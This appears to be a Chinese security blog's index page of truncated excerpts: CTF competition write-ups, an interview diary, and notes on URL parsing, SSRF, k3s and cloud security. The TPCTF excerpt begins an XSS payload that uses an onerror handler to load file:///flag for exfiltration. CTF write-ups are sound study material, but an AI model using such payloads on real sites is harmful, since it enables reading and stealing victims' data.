鹏城杯2023wp-决赛-深圳-day1 手册 大家有些选手不及时 出席的 ，第一次进入鹏城实验室 没有腕带 就报来由，还是不行 就大打 选手手册 中 留的 紧急联系电话：18529592717（李老师） 大家注意哈，明天比赛 请从 上图中的 鹏城实验室 东门进入，门卫统一在 东门 审核身份，提问来由请回复“参加鹏城杯决赛，已报备”。感谢您的配合！…

xctf-TPCTF wp 还得是xctf，现在xctf的web题都没web界面了屌 XSSBOT 想法很简单，直接读文件然后外带 <img src="xasdasdasd" onerror="document.write('<iframe src=file:///flag></ifr…

2023强网拟态线上预选赛wp 不说了放图，前12晋级，不知道怎么顺延到咱第20的 还真是，好怪哦，再看一眼！ oumisotuitennnoka 非预期做法，感谢@micgo，学弟越来越屌了 <?php highlight_file(__FILE__); $dir = '/tmp'; $htContent = <&…

鹏城杯2023wp 介绍 一年一度的在深圳鹏城实验室的暑假到秋季举办的线下比赛，去年比赛以渗透赛为主，有非常趣味的体验，今年则增加了很多工控，实车，5G的场景 这个是线上比赛Aurora的wp，最终线上比赛的成绩，【aurora】和【大家好我是超威蓝猫】都晋级了，可以领到每人1k的低保，好开心！ web-web1 H::desturct->H…

xctf-actf-wp 前言 最终成绩是21名 第一天面试去了，早上和晚上抽空看了下做出了craftcms （非预期解法,因为预期解法打不通） 第二天白天睡了一天（连续一个星期8点钟起床高强度面试，顶不住了），凌晨2点打到7点出了Ave Mujica's Masquerade，然后倒头就睡到深夜 边面试边比赛真的很难顶，好在这次题目质量非常不错！…

2023秋招校招面经之路 前言 2023.11.8 笔者认为互联网秋招基本结束，虽然他本人仍然杳无音讯。 笔者身为0offer选手不敢给大伙建议，故以下面经一改往日”一面试一准备“风格，尽量客观记录，仅供参考 美团 笔试 8.12 2道ac，1道50%（原因是没看数据长度，忽略了int长度限制，改为long就能ac），1道36%(但是本地过了，不懂…

URL 变形记 url语法 通用语法<scheme>://<user>:<password>@<host>:<port>/<url-path> ,其中scheme包含http、ftp、gopher、file 等网络协议 漏洞条件 黑盒 单点登陆的服务器下，登陆请求会存在?ser…

SSRF 介绍 简介：服务端请求伪造。往往是使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等，如果这个功能被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器 漏洞场景 - 黑盒 当服务器后端提供远程资源文件（如远程图片，网页等）功能时，若能够输入完整的URL且服务器端无有效性校验时，则有可能ssrf 加载远…

k3s 搭建使用指南 参考资料 k8s入门教程： k8s的官网 https://zhuanlan.zhihu.com/p/584076089 新建标签页 (eastjun.top) 云上测试工具： github.com/cdk-team/CDK kubernets 靶场： kubernetes-goat 搭建思路 1.写个镜像dockerfile/…

云安全 1.能力地图 云原生全景图 2.背景知识 docker、Kubernetes 仍处于活跃更新的状态，不同版本的特点可能与本文所述有出入。本文未一一考证边界版本，故而诸如某进程默认监听的端口号、某端口默认是否需要认证 等具体事实需要读者根据实际环境自行判断。 2.1 docker 2.1.1 docker 的表象 在安装了docker的系统中…